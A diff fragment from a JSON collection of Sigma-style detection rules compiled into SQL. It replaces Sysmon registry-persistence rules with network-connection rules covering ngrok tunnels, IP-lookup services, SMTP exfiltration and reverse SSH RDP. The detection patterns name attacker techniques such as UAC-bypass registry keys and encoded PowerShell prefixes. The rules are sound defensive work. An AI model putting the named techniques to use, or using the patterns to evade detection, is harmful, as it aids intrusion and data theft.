"b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", + "status": "experimental", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname 
LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE 
'%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "test", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011", + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 
'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "status": "experimental", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
(EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_telemetry_persistence.yml" + 
"filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate use of the dll." + "Other SMTP tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the 
file extension through modification of the registry", - "author": "frack113", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "status": "experimental", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Administrative scripts" + "Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": 
"5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.command_and_control", "attack.t1105" 
@@ -34718,4656 +34576,4829 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", + "status": "experimental", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - 
"attack.defense_evasion", - "attack.t1574.012" + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": 
"registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "status": "experimental", + "description": "Detects suspicious network connection by Cmstp", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Potential Persistence Via MyComputer Registry 